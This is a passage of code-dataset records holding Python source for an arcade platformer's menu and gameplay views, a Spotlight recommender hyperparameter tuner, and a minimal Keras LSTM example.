BUTTONS['big_left'][0], scale=1.4)\n arcade.draw_scaled_texture_rectangle(BUTTONS['big_right'][1], BUTTONS['big_right'][2],\n BUTTONS['big_right'][0], scale=1.4)\n arcade.draw_text(\"EXIT\", SCREEN_WIDTH / 10, SCREEN_HEIGHT / 10,\n arcade.color.BLACK, font_size=20, anchor_x=\"center\")\n arcade.draw_text(\"SELECT LEVEL\", SCREEN_WIDTH / 1.1, SCREEN_HEIGHT / 10,\n arcade.color.BLACK, font_size=17, anchor_x=\"center\")\n\n arcade.draw_scaled_texture_rectangle(BUTTONS['author'][1], BUTTONS['author'][2],\n BUTTONS['author'][0], scale=0.7)\n arcade.draw_scaled_texture_rectangle(BUTTONS['instruction'][1], BUTTONS['instruction'][2],\n BUTTONS['instruction'][0], scale=0.7)\n arcade.draw_scaled_texture_rectangle(BUTTONS['scores'][1], BUTTONS['scores'][2],\n BUTTONS['scores'][0], scale=0.7)\n arcade.draw_text(\"?\", BUTTONS['instruction'][1], BUTTONS['instruction'][2] - 15,\n arcade.color.BLACK, font_size=25, anchor_x=\"center\")\n arcade.draw_text(\"Scores\", BUTTONS['scores'][1], BUTTONS['scores'][2] - 5,\n arcade.color.BLACK, font_size=10, anchor_x=\"center\")\n arcade.draw_text(\"A\", BUTTONS['author'][1], BUTTONS['author'][2] - 15,\n arcade.color.BLACK, font_size=25, anchor_x=\"center\")\n\n def on_mouse_press(self, x: float, y: float, button: int, modifiers: int):\n button_list = [BUTTONS['big_left'], BUTTONS['big_right'],\n BUTTONS['instruction'], BUTTONS['scores'], BUTTONS['author']]\n self.eval_button(x, y, button_list)\n arcade.play_sound(self.menu_select)\n\n def eval_button(self, x, y, button_list):\n for i in button_list:\n texture = i[0]\n w = i[1]\n h = i[2]\n if w - texture.width // 2 <= x <= w + texture.width // 2:\n if h - texture.height // 2 <= y <= h + texture.height // 2:\n eval(i[3])\n\n\nclass LevelSelect(arcade.View):\n def __init__(self):\n super().__init__()\n self.menu_select = arcade.load_sound(\"sounds/menu_selection_click.wav\")\n\n def on_draw(self):\n 
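# level-select screen: draw the background, the heading, and one button per level\n 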
\"\"\" Draw the menu \"\"\"\n arcade.start_render()\n arcade.draw_lrwh_rectangle_textured(0, 0, SCREEN_WIDTH, SCREEN_HEIGHT,\n arcade.load_texture(\"png_ground/BG/BG.png\"))\n arcade.draw_lrwh_rectangle_textured(0, 0, SCREEN_WIDTH, SCREEN_HEIGHT,\n arcade.load_texture(\"images/level_select.png\"))\n arcade.draw_text(\"SELECT THE LEVEL\", SCREEN_WIDTH / 2, SCREEN_HEIGHT / 1.3,\n arcade.color.BLACK, font_size=30, anchor_x=\"center\")\n\n arcade.draw_scaled_texture_rectangle(BUTTONS['first_level'][1], BUTTONS['first_level'][2],\n BUTTONS['first_level'][0], scale=0.7)\n arcade.draw_scaled_texture_rectangle(BUTTONS['second_level'][1], BUTTONS['second_level'][2],\n BUTTONS['second_level'][0], scale=0.7)\n arcade.draw_scaled_texture_rectangle(BUTTONS['escape_level'][1], BUTTONS['escape_level'][2],\n BUTTONS['escape_level'][0], scale=0.7)\n\n def on_mouse_press(self, x: float, y: float, button: int, modifiers: int):\n arcade.play_sound(self.menu_select)\n button_list = [BUTTONS['first_level'], BUTTONS['second_level'], BUTTONS['escape_level']]\n for i in button_list:\n texture = i[0]\n w = i[1]\n h = i[2]\n if w - texture.width // 2 <= x <= w + texture.width // 2:\n if h - texture.height // 2 <= y <= h + texture.height // 2:\n if i == BUTTONS['first_level']:\n game_view = MyGame()\n game_view.setup()\n self.window.show_view(game_view)\n elif i == BUTTONS['second_level']:\n game_view = MyGame()\n game_view.level = 2\n game_view.setup()\n self.window.show_view(game_view)\n elif i == BUTTONS['escape_level']:\n self.window.show_view(GameMenu())\n\n\nclass Instructions(arcade.View):\n def __init__(self):\n super().__init__()\n self.menu_select = arcade.load_sound(\"sounds/menu_selection_click.wav\")\n\n def on_draw(self):\n arcade.start_render()\n arcade.draw_lrwh_rectangle_textured(0, 0, SCREEN_WIDTH, SCREEN_HEIGHT,\n arcade.load_texture(\"png_ground/BG/BG.png\"))\n arcade.draw_text(\"INSTRUCTION\", SCREEN_WIDTH / 2, SCREEN_HEIGHT / 1.2, arcade.color.BLACK, font_size=50,\n anchor_x=\"center\")\n\n arcade.draw_text(\"Collect coins and find the exit!\", SCREEN_WIDTH / 2,\n SCREEN_HEIGHT / 1.5, arcade.color.ORANGE_PEEL, font_size=50,\n anchor_x=\"center\")\n arcade.draw_text(\"Use arrow keys to run and space bar for jump.\\n\\n\"\n \"Press P to pause the game\",\n SCREEN_WIDTH / 2, SCREEN_HEIGHT / 2.3, arcade.color.BLACK, font_size=30, anchor_x=\"center\")\n\n draw_menu_button()\n\n def on_mouse_press(self, x: float, y: float, button: int, modifiers: int):\n arcade.play_sound(self.menu_select)\n button_list = [BUTTONS['menu']]\n GameMenu().eval_button(x, y, button_list)\n\n\ndef draw_menu_button():\n arcade.draw_scaled_texture_rectangle(BUTTONS['menu'][1], BUTTONS['menu'][2],\n BUTTONS['menu'][0], scale=1.4)\n arcade.draw_text(\"MENU\",\n SCREEN_WIDTH / 15.5, SCREEN_HEIGHT / 9.5, arcade.color.BLACK, font_size=20, align=\"right\")\n\n\nclass Author(arcade.View):\n def __init__(self):\n super().__init__()\n self.menu_select = arcade.load_sound(\"sounds/menu_selection_click.wav\")\n\n def on_draw(self):\n arcade.start_render()\n arcade.draw_lrwh_rectangle_textured(0, 0, SCREEN_WIDTH, SCREEN_HEIGHT,\n arcade.load_texture(\"png_ground/BG/BG.png\"))\n arcade.draw_lrwh_rectangle_textured(0, 0, SCREEN_WIDTH, SCREEN_HEIGHT,\n arcade.load_texture(\"images/author.png\"))\n arcade.draw_text(\"ABOUT AUTHOR\", SCREEN_WIDTH / 2, SCREEN_HEIGHT / 1.2, arcade.color.ORANGE_PEEL, font_size=50,\n anchor_x=\"center\")\n arcade.draw_text(\"Math student \\n\"\n \"who was used to play \\n platform games a lot.\\n\\n\"\n \"Enjoy 
the game!\",\n SCREEN_WIDTH / 3.1, SCREEN_HEIGHT / 2.4, arcade.color.LIGHT_CYAN, font_size=30,\n anchor_x=\"center\")\n draw_menu_button()\n\n def on_mouse_press(self, x: float, y: float, button: int, modifiers: int):\n arcade.play_sound(self.menu_select)\n button_list = [BUTTONS['menu']]\n GameMenu().eval_button(x, y, button_list)\n\n\nclass ScoreTable(arcade.View):\n def __init__(self):\n super().__init__()\n self.menu_select = arcade.load_sound(\"sounds/menu_selection_click.wav\")\n\n def show_table(self):\n arcade.draw_text(\"LATEST SCORE\", SCREEN_WIDTH / 2, SCREEN_HEIGHT / 1.3,\n arcade.color.BLACK, font_size=30, anchor_x=\"center\")\n t = open('scores.txt', 'r')\n table = t.readlines()\n for i in table:\n arcade.draw_text(i, SCREEN_WIDTH / 4, SCREEN_HEIGHT / 1.5,\n arcade.color.BLACK, font_size=30, anchor_x=\"center\")\n\n def on_draw(self):\n arcade.start_render()\n arcade.draw_lrwh_rectangle_textured(0, 0, SCREEN_WIDTH, SCREEN_HEIGHT,\n arcade.load_texture(\"png_ground/BG/BG.png\"))\n self.show_table()\n draw_menu_button()\n\n def on_mouse_press(self, x: float, y: float, button: int, modifiers: int):\n arcade.play_sound(self.menu_select)\n button_list = [BUTTONS['menu']]\n GameMenu().eval_button(x, y, button_list)\n\n\nclass MyGame(arcade.View):\n \"\"\"\n Main application class.\n \"\"\"\n\n def __init__(self):\n\n # Call the parent class and set up the window\n super().__init__()\n\n # Sprite lists\n self.player_list = None\n self.wall_list = None\n self.coin_list = None\n self.background = None\n self.foreground = None\n self.goal = None\n self.moving = None\n self.pins = None\n\n # Set up the player\n self.player_sprite = None\n\n # Add physics engine\n self.physics_engine = None\n\n # self.back = None\n arcade.set_background_color(arcade.csscolor.CORNFLOWER_BLUE)\n self.end_of_map = 0\n self.view_left = 0\n self.view_bottom = 0\n self.score = 0\n self.level = 1\n self.life = 3\n\n # sounds\n self.coin_sound = arcade.load_sound(\":resources:sounds/coin5.wav\")\n self.jump_sound = arcade.load_sound(\":resources:sounds/jump3.wav\")\n self.lost_life_sound = arcade.load_sound(\":resources:sounds/hit4.wav\")\n self.finish_level_sound = arcade.load_sound(\":resources:sounds/upgrade1.wav\")\n self.game_over_sound = arcade.load_sound(\"sounds/error.wav\")\n self.game_creature = arcade.load_sound(\"sounds/game_creature.wav\")\n self.current_player = None\n self.music = None\n\n def play_song(self):\n # stop currently playing\n if self.music:\n self.music.stop(self.current_player)\n\n # play next song\n self.music = arcade.Sound(\"sounds/childish_theme.WAV\", streaming=True)\n self.current_player = self.music.play(volume=0.1, loop=True)\n time.sleep(0.03)\n\n def setup(self):\n \"\"\" Set up the game here. Call this function to restart the game. 
\"\"\"\n # Reset the viewport\n self.view_left = 0\n self.view_bottom = 0\n\n self.player_list = arcade.SpriteList()\n self.player_sprite = self.create_player_sprite()\n arcade.play_sound(self.game_creature)\n self.player_list.append(self.player_sprite)\n\n # add map to game\n my_map = arcade.tilemap.read_tmx(f\"my_map{self.level}.tmx\")\n self.background = arcade.tilemap.process_layer(map_object=my_map, layer_name=\"background\", scaling=0.7)\n self.wall_list = arcade.tilemap.process_layer(map_object=my_map, layer_name=\"ground\", scaling=0.7)\n self.pins = arcade.tilemap.process_layer(map_object=my_map, layer_name=\"don'touch\", scaling=0.7)\n self.goal = arcade.tilemap.process_layer(map_object=my_map, layer_name=\"goal\", scaling=0.7)\n self.foreground = arcade.tilemap.process_layer(map_object=my_map, layer_name=\"foreground\", scaling=0.7)\n self.moving = arcade.tilemap.process_layer(map_object=my_map, layer_name=\"moving-platform\", scaling=0.7)\n self.coin_list = arcade.tilemap.process_layer(map_object=my_map, layer_name=\"collectable\", scaling=0.7)\n\n for sprite in self.moving:\n self.wall_list.append(sprite)\n\n self.end_of_map = my_map.map_size.width\n self.map_width = (my_map.map_size.width - 1) * my_map.tile_size.width\n\n self.physics_engine = arcade.PhysicsEnginePlatformer(self.player_sprite, self.wall_list, GRAVITY)\n\n # Setup music\n self.play_song()\n\n # Move the player sprite back to the beginning\n self.player_sprite.center_x = PLAYER_START_X\n self.player_sprite.center_y = PLAYER_START_Y\n\n def create_player_sprite(self) -> arcade.AnimatedWalkingSprite:\n \"\"\"Creates the animated player sprite\n\n Returns:\n The properly set up player sprite\n \"\"\"\n # Where are the player images stored?\n texture_path = \":resources:images/animated_characters/female_adventurer/\"\n\n # Set up the appropriate textures\n walking_paths = [texture_path + f\"femaleAdventurer_walk{x}.png\" for x in range(0, 7)]\n standing_path = texture_path + \"femaleAdventurer_idle.png\"\n jumping_path = texture_path + \"femaleAdventurer_jump.png\"\n\n # Load them all now\n walking_right_textures = [arcade.load_texture(texture) for texture in walking_paths]\n walking_left_textures = [arcade.load_texture(texture, mirrored=True) for texture in walking_paths]\n\n standing_right_textures = [arcade.load_texture(standing_path)]\n standing_left_textures = [arcade.load_texture(standing_path, mirrored=True)]\n\n jumping_right_textures = [arcade.load_texture(jumping_path)]\n jumping_left_textures = [arcade.load_texture(jumping_path, mirrored=True)]\n\n # Create the sprite\n player = arcade.AnimatedWalkingSprite()\n\n # Add the proper textures\n player.stand_left_textures = standing_left_textures\n player.stand_right_textures = standing_right_textures\n player.walk_left_textures = walking_left_textures\n player.walk_right_textures = walking_right_textures\n player.jumping_right_textures = jumping_right_textures\n player.jumping_left_textures = jumping_left_textures\n\n # Move the player sprite back to the beginning\n player.center_x = PLAYER_START_X\n player.center_y = PLAYER_START_Y\n player.state = arcade.FACE_RIGHT\n\n # Set the initial texture\n player.texture = player.stand_right_textures[0]\n\n return player\n\n def scroll_viewport(self) -> None:\n \"\"\"Scrolls the viewport when the player gets close to the edges\"\"\"\n change_viewport = False\n # Scroll left\n # Find the current left boundary\n left_boundary = self.view_left + LEFT_VIEWPORT_MARGIN\n\n # Are we to the left of this boundary? 
Then we should scroll left.\n if self.player_sprite.left < left_boundary:\n self.view_left -= left_boundary - self.player_sprite.left\n change_viewport = True\n # But don't scroll past the left edge of the map\n if self.view_left < 0:\n self.view_left = 0\n\n # Scroll right\n # Find the current right boundary\n right_boundary = self.view_left + SCREEN_WIDTH - RIGHT_VIEWPORT_MARGIN\n\n # Are we to the right of this boundary? Then we should scroll right.\n if self.player_sprite.right > right_boundary:\n self.view_left += self.player_sprite.right - right_boundary\n change_viewport = True\n # Don't scroll past the right edge of the map\n if self.view_left > self.map_width - SCREEN_WIDTH:\n self.view_left = self.map_width - SCREEN_WIDTH\n\n self.view_bottom = int(self.view_bottom)\n self.view_left = int(self.view_left)\n\n # Do the scrolling\n if change_viewport:\n arcade.set_viewport(\n left=self.view_left,\n right=SCREEN_WIDTH + self.view_left,\n bottom=self.view_bottom,\n top=SCREEN_HEIGHT + self.view_bottom,\n )\n\n def draw_life_counter(self):\n life = self.life\n life_table = [150, 200, 250]\n if life == 3:\n for l in life_table:\n arcade.draw_texture_rectangle(l + self.view_left, 570 + self.view_bottom,\n SCREEN_WIDTH / 20, SCREEN_HEIGHT / 15,\n arcade.load_texture(\"images/HUD/hudHeart_full.png\"))\n elif life == 2:\n for l in life_table[:-1]:\n arcade.draw_texture_rectangle(l + self.view_left, 570 + self.view_bottom,\n SCREEN_WIDTH / 20, SCREEN_HEIGHT / 15,\n arcade.load_texture(\"images/HUD/hudHeart_full.png\"))\n arcade.draw_texture_rectangle(life_table[2] + self.view_left, 570 + self.view_bottom,\n SCREEN_WIDTH / 20, SCREEN_HEIGHT / 15,\n arcade.load_texture(\"images/HUD/hudHeart_empty.png\"))\n elif life == 1:\n arcade.draw_texture_rectangle(life_table[0] + self.view_left, 570 + self.view_bottom,\n SCREEN_WIDTH / 20, SCREEN_HEIGHT / 15,\n arcade.load_texture(\"images/HUD/hudHeart_full.png\"))\n for l in life_table[1:]:\n arcade.draw_texture_rectangle(l + self.view_left, 570 + self.view_bottom,\n SCREEN_WIDTH / 20, SCREEN_HEIGHT / 15,\n arcade.load_texture(\"images/HUD/hudHeart_empty.png\"))\n\n def on_draw(self):\n \"\"\" Render the screen. \"\"\"\n\n arcade.start_render()\n self.background.draw()\n self.wall_list.draw()\n self.pins.draw()\n self.goal.draw()\n self.coin_list.draw()\n self.player_list.draw()\n self.foreground.draw()\n score_text = f\"Score: {self.score}\"\n level_text = f\"Level: {self.level}\"\n arcade.draw_text(level_text, start_x=10 + self.view_left, start_y=570 + self.view_bottom,\n color=arcade.csscolor.DARK_ORANGE, font_size=20)\n arcade.draw_text(score_text, start_x=10 + self.view_left,\n start_y=540 + self.view_bottom, color=arcade.csscolor.GOLD, font_size=20)\n self.draw_life_counter()\n\n def on_key_press(self, key, modifiers):\n \"\"\" Called whenever the user presses a key. \"\"\"\n if key == arcade.key.LEFT:\n self.player_sprite.change_x = -MOVEMENT_SPEED\n elif key == arcade.key.RIGHT:\n self.player_sprite.change_x = MOVEMENT_SPEED\n elif key == arcade.key.SPACE:\n if self.physics_engine.can_jump():\n self.player_sprite.change_y = PLAYER_JUMP_SPEED\n arcade.play_sound(self.jump_sound)\n elif key == arcade.key.P:\n pause = PauseView(self)\n self.window.show_view(pause)\n\n def on_key_release(self, key, modifiers):\n \"\"\"Called when the user releases a key. 
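Releasing either arrow key stops the player's horizontal movement. 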
\"\"\"\n if key == arcade.key.LEFT:\n self.player_sprite.change_x = 0\n elif key == arcade.key.RIGHT:\n self.player_sprite.change_x = 0\n\n def update(self, delta_time):\n \"\"\" Movement and game logic \"\"\"\n\n # Move the player with the physics engine\n self.physics_engine.update()\n\n if self.player_sprite.center_y < -100:\n self.life_check()\n\n self.scroll_viewport()\n self.player_sprite.update_animation(delta_time)\n self.wall_list.update()\n\n for wall in self.wall_list:\n if wall.boundary_right and wall.right > wall.boundary_right and wall.change_x > 0:\n wall.change_x *= -1\n elif wall.boundary_left and wall.left < wall.boundary_left and wall.change_x < 0:\n wall.change_x *= -1\n elif wall.boundary_top and wall.top > wall.boundary_top and wall.change_y > 0:\n wall.change_y *= -1\n elif wall.boundary_bottom and wall.bottom < wall.boundary_bottom and wall.change_y < 0:\n wall.change_y *= -1\n\n collected_coins = arcade.check_for_collision_with_list(\n sprite=self.player_sprite, sprite_list=self.coin_list\n )\n\n for coin in collected_coins:\n # Add the coin score to our score\n self.score += 1\n arcade.play_sound(self.coin_sound)\n coin.remove_from_sprite_lists()\n\n goals_hit = arcade.check_for_collision_with_list(\n sprite=self.player_sprite, sprite_list=self.goal\n )\n\n if goals_hit:\n bravo = Congrats(self)\n self.window.show_view(bravo)\n if self.music:\n self.music.stop(self.current_player)\n arcade.play_sound(self.finish_level_sound)\n\n if arcade.check_for_collision_with_list(self.player_sprite, self.pins):\n self.life_check()\n\n def return_to_start(self):\n self.player_sprite.center_x = PLAYER_START_X\n self.player_sprite.center_y = PLAYER_START_Y\n self.view_left = 0\n self.view_bottom = 0\n self.play_song()\n\n def life_check(self):\n if self.life >= 2:\n self.life -= 1\n self.draw_life_counter()\n arcade.play_sound(self.lost_life_sound)\n self.return_to_start()\n elif self.life == 1:\n self.window.show_view((GameOver(self)))\n if self.music:\n self.music.stop(self.current_player)\n arcade.play_sound(self.game_over_sound)\n\n\n def update_score(self):\n f = open('scores.txt', 'w')\n f.write(\"Level: \" + str(self.level) + \" score: \" + str(self.score))\n f.close()\n\n\nclass PauseView(arcade.View):\n def __init__(self, game_view):\n super().__init__()\n self.game_view = game_view\n self.fill_color = arcade.make_transparent_color(arcade.color.WHITE, transparency=80)\n\n def on_draw(self):\n self.game_view.on_draw()\n arcade.draw_lrtb_rectangle_filled(\n left=self.game_view.view_left,\n right=self.game_view.view_left + SCREEN_WIDTH,\n top=self.game_view.view_bottom + SCREEN_HEIGHT,\n bottom=self.game_view.view_bottom,\n color=self.fill_color,\n )\n arcade.draw_text(\"PAUSED\", self.game_view.view_left + 100, self.game_view.view_bottom + 400,\n arcade.color.RED_ORANGE, font_size=40, align=\"center\")\n arcade.draw_text(\"PRESS P TO RESUME\", self.game_view.view_left + 100, self.game_view.view_bottom + 300,\n arcade.color.YELLOW_ROSE, font_size=20, align=\"right\")\n self.draw_menu_gameplay()\n\n def draw_menu_gameplay(self):\n arcade.draw_scaled_texture_rectangle(self.game_view.view_left + 80, self.game_view.view_bottom + 67,\n arcade.load_texture(\"images/HUD/hudJewel_yellow.png\"), scale=1.4)\n arcade.draw_text(\"MENU\", self.game_view.view_left + 50, self.game_view.view_bottom + 60,\n arcade.color.BLACK, font_size=20, align=\"center\")\n\n def eval_menu_gameplay(self, x, y):\n button_list = [arcade.load_texture(\"images/HUD/hudJewel_yellow.png\"),\n SCREEN_WIDTH / 
10, SCREEN_HEIGHT / 9,\n \"self.window.show_view(GameMenu())\"]\n texture = button_list[0]\n if button_list[1] - texture.width // 2 <= x <= button_list[1] + texture.width // 2:\n if button_list[2] - texture.height // 2 <= y <= button_list[2] + texture.height // 2:\n eval(button_list[3])\n arcade.set_viewport(left=0, right=SCREEN_WIDTH, bottom=0, top=SCREEN_HEIGHT)\n\n def on_mouse_press(self, x: float, y: float, button: int, modifiers: int):\n self.eval_menu_gameplay(x, y)\n if self.game_view.music:\n self.game_view.music.stop(self.game_view.current_player)\n\n def on_key_press(self, key, _modifiers):\n if key == arcade.key.P:\n self.window.show_view(self.game_view)\n\n\nclass GameOver(arcade.View):\n def __init__(self, game_view):\n super().__init__()\n self.game_view = game_view\n self.fill_color = arcade.make_transparent_color(arcade.color.WHITE, transparency=90)\n\n def on_draw(self):\n \"\"\" Draw the menu \"\"\"\n arcade.start_render()\n arcade.draw_lrwh_rectangle_textured(\n bottom_left_x=self.game_view.view_left,\n bottom_left_y=self.game_view.view_bottom,\n width=SCREEN_WIDTH,\n height=SCREEN_HEIGHT,\n texture=arcade.load_texture(\"images/JWDLx5AZBtI.jpg\"),\n alpha=200)\n arcade.draw_scaled_texture_rectangle(self.game_view.view_left + 400, self.game_view.view_bottom + 150,\n arcade.load_texture(\"images/Tiles/lockRed.png\"), scale=1.4)\n arcade.draw_text(\"GAME OVER\", self.game_view.view_left + 400, self.game_view.view_bottom + 400,\n arcade.color.BLACK, font_size=50, anchor_x=\"center\")\n arcade.draw_text(\"PRESS ENTER TO REPLAY\", self.game_view.view_left + 400, self.game_view.view_bottom + 300,\n arcade.color.ORANGE_PEEL, font_size=30, anchor_x=\"center\")\n PauseView(self.game_view).draw_menu_gameplay()\n self.game_view.update_score()\n\n def on_mouse_press(self, x: float, y: float, button: int, modifiers: int):\n arcade.set_viewport(left=0, right=SCREEN_WIDTH, bottom=0, top=SCREEN_HEIGHT)\n PauseView(self.game_view).eval_menu_gameplay(x, y)\n\n def on_key_press(self, key, _modifiers):\n if key == arcade.key.ENTER:\n self.game_view.player_sprite.change_x = 0\n self.game_view.player_sprite.change_y = 0\n self.game_view.return_to_start()\n self.game_view.life = 3\n self.game_view.score = 0\n self.game_view.setup()\n self.window.show_view(self.game_view)\n arcade.set_viewport(left=0, right=SCREEN_WIDTH, bottom=0, top=SCREEN_HEIGHT)\n\n\nclass Congrats(arcade.View):\n def __init__(self, game_view):\n super().__init__()\n self.game_view = game_view\n self.fill_color = arcade.make_transparent_color(arcade.color.WHITE, transparency=90)\n\n def on_draw(self):\n \"\"\" Draw the congratulations\"\"\"\n arcade.start_render()\n arcade.draw_lrwh_rectangle_textured(\n bottom_left_x=self.game_view.view_left,\n bottom_left_y=self.game_view.view_bottom,\n width=SCREEN_WIDTH,\n height=SCREEN_HEIGHT,\n texture=arcade.load_texture(\"images/congrats.png\"))\n arcade.draw_text(\"CONGRATULATION\", self.game_view.view_left + 100, self.game_view.view_bottom + 500,\n arcade.color.YELLOW_ROSE, font_size=50, align=\"center\")\n self.level_status_draw()\n PauseView(self.game_view).draw_menu_gameplay()\n self.game_view.update_score()\n\n def level_status_draw(self):\n if self.game_view.level == 2:\n arcade.draw_text(\"GAME FINISHED\", self.game_view.view_left + 100,\n self.game_view.view_bottom + 450,\n arcade.color.YELLOW_ROSE, font_size=30, align=\"right\")\n else:\n arcade.draw_text(\"TO NEXT LEVEL PRESS ENTER\", self.game_view.view_left + 100,\n self.game_view.view_bottom + 450,\n 
arcade.color.YELLOW_ROSE, font_size=30, align=\"right\")\n\n def on_mouse_press(self, x: float, y: float, button: int, modifiers: int):\n arcade.set_viewport(left=0, right=SCREEN_WIDTH, bottom=0, top=SCREEN_HEIGHT)\n PauseView(self.game_view).eval_menu_gameplay(x, y)\n\n def on_key_press(self, key, _modifiers):\n if self.game_view.level != 2:\n if key == arcade.key.ENTER:\n arcade.set_viewport(left=0, right=SCREEN_WIDTH, bottom=0, top=SCREEN_HEIGHT)\n self.game_view.level += 1\n self.game_view.score = 0\n self.game_view.life = 3\n self.game_view.setup()\n self.window.show_view(self.game_view)\n\n","sub_path":"views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":30015,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"27317869","text":"import shutil\nimport os\nimport argparse\n\nfrom spotlight.cross_validation import user_based_train_test_split\nfrom spotlight.sequence.implicit import ImplicitSequenceModel\nfrom spotlight.sequence.representations import CNNNet\nfrom spotlight.evaluation import sequence_mrr_score\n\nfrom sklearn.model_selection import ParameterSampler\n\nimport mrecsys.sequence\nfrom mrecsys.utils.model_selection import EvalResults\nfrom mrecsys.utils.dataset import load_latest_interactions\n\nos.chdir(os.path.dirname(__file__))\n\nCUDA = (os.environ.get('CUDA') is not None or shutil.which('nvidia-smi') is not None)\n\nNUM_SAMPLES = 100\nLOSSES = ['bpr', 'pointwise', 'hinge', 'adaptive_hinge']\nN_ITER = list(range(15, 40, 5))\nMETRICS = ['mrr', 'p@k', 'r@k', 'rmse']\n\n\ndef sample_cnn_hyperparameters(random_state, num):\n space = {\n 'n_iter': N_ITER,\n 'loss': LOSSES,\n 'kernel_width': [3, 5, 7],\n 'num_layers': list(range(1, 10)),\n 'dilation_multiplier': [1, 2],\n 'nonlinearity': ['tanh', 'relu'],\n 'residual': [True, False]\n }\n\n sampler = ParameterSampler(space,\n n_iter=num,\n random_state=random_state)\n\n for params in sampler:\n params['dilation'] = list(params['dilation_multiplier'] ** (i % 8)\n for i in range(params['num_layers']))\n yield params\n\n\ndef sample_lstm_hyperparameters(random_state, num):\n space = {\n 'n_iter': N_ITER,\n 'loss': LOSSES,\n }\n sampler = ParameterSampler(space,\n n_iter=num,\n random_state=random_state)\n for params in sampler:\n yield params\n\n\ndef sample_immf_hyperparameters(random_state, num):\n space = {\n 'loss': LOSSES,\n 'n_iter': N_ITER,\n }\n sampler = ParameterSampler(space,\n n_iter=num,\n random_state=random_state)\n for params in sampler:\n yield params\n\n\ndef evaluate_cnn_model(hyperparameters, train, test, validation, random_state):\n h = hyperparameters\n\n net = CNNNet(train.num_items,\n kernel_width=h['kernel_width'],\n dilation=h['dilation'],\n num_layers=h['num_layers'],\n nonlinearity=h['nonlinearity'],\n residual_connections=h['residual'])\n\n model = ImplicitSequenceModel(loss=h['loss'],\n representation=net,\n n_iter=h['n_iter'],\n use_cuda=CUDA,\n random_state=random_state)\n\n model.fit(train, verbose=True)\n\n test_eval = {}\n test_eval['mrr'] = sequence_mrr_score(model, test).mean()\n\n val_eval = {}\n val_eval['mrr'] = sequence_mrr_score(model, validation).mean()\n\n return test_eval, val_eval\n\n\ndef evaluate_lstm_model(hyperparameters, train, test, validation, random_state):\n h = hyperparameters\n\n model = ImplicitSequenceModel(loss=h['loss'],\n representation='lstm',\n n_iter=h['n_iter'],\n use_cuda=CUDA,\n random_state=random_state)\n\n model.fit(train, verbose=True)\n\n test_eval = {}\n test_eval['mrr'] = 
sequence_mrr_score(model, test).mean()\n\n val_eval = {}\n val_eval['mrr'] = sequence_mrr_score(model, validation).mean()\n\n return test_eval, val_eval\n\n\ndef evaluate_pooling_model(hyperparameters, train, test, validation, random_state):\n h = hyperparameters\n\n model = ImplicitSequenceModel(loss=h['loss'],\n representation='pooling',\n n_iter=h['n_iter'],\n use_cuda=CUDA,\n random_state=random_state)\n\n model.fit(train, verbose=True)\n\n test_eval = {}\n test_eval['mrr'] = sequence_mrr_score(model, test).mean()\n\n val_eval = {}\n val_eval['mrr'] = sequence_mrr_score(model, validation).mean()\n\n return test_eval, val_eval\n\n\ndef tuning(train, test, validation, random_state, model_type, time_code):\n\n if model_type != 'immf':\n train = train.to_sequence()\n test = test.to_sequence()\n validation = validation.to_sequence()\n\n if model_type == 'cnn':\n eval_fnc, sample_fnc = (evaluate_cnn_model,\n sample_cnn_hyperparameters)\n elif model_type == 'lstm':\n eval_fnc, sample_fnc = (evaluate_lstm_model,\n sample_lstm_hyperparameters)\n elif model_type == 'pooling':\n eval_fnc, sample_fnc = (evaluate_pooling_model,\n sample_lstm_hyperparameters)\n else:\n raise ValueError('Unknown model type')\n\n results = EvalResults(os.path.join(mrecsys.sequence.__result_path__, 'tuning/{}_results.txt'.format(model_type, time_code)))\n best_results = {}\n for metric in METRICS:\n if results.best(metric) is not None:\n best_results[metric] = results.best(metric)\n print('Best {} result by {}: {}'.format(model_type, metric, best_results[metric]))\n\n for hyperparameters in sample_fnc(random_state, NUM_SAMPLES):\n if hyperparameters in results:\n continue\n\n try:\n print('Evaluating {}'.format(hyperparameters))\n\n (test_eval, val_eval) = eval_fnc(hyperparameters,\n train,\n test,\n validation,\n random_state)\n print('test_eval:', test_eval)\n print('val_eval:', val_eval)\n results.save(hyperparameters, test_eval, val_eval)\n except KeyboardInterrupt as e:\n raise e\n except:\n pass\n\n return results\n\n\ndef run(model_type=None):\n random_state = mrecsys.sequence.__random_state__\n\n if model_type is None:\n model_type = input('Enter model type (cnn / lstm / pooling): ')\n print('CUDA:', CUDA)\n interactions, time_code, _, _ = load_latest_interactions()\n train, rest = user_based_train_test_split(interactions, random_state=random_state)\n test, validation = user_based_train_test_split(rest, random_state=random_state)\n print('Split into \\n {} and \\n {} and \\n {}.'.format(train, test, validation))\n\n tuning(train, test, validation, random_state, model_type, time_code)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--model', help='define the network (cnn / lstm / pooling)')\n args = parser.parse_args()\n model_type = args.model\n run(model_type)\n","sub_path":"mrecsys/sequence/tuner.py","file_name":"tuner.py","file_ext":"py","file_size_in_byte":6793,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"116612521","text":"# LSTM Long Short Term Memory\n\n#1. Data\nimport numpy as np\n\nx = np.array([[1,2,3], [2,3,4], [3,4,5], [4,5,6]])\ny = np.array([4,5,6,7])\nx = x.reshape(4,3,1)\n\nprint(x.shape, y.shape)\n\n#2. 
Model\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Dense, LSTM\n\nmodel = Sequential()\nmodel.add(LSTM(10, input_shape=(3, 1)))\nmodel.add(Dense(10))\nmodel.add(Dense(1))\n","sub_path":"keras/keras25_LSTM.py","file_name":"keras25_LSTM.py","file_ext":"py","file_size_in_byte":390,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
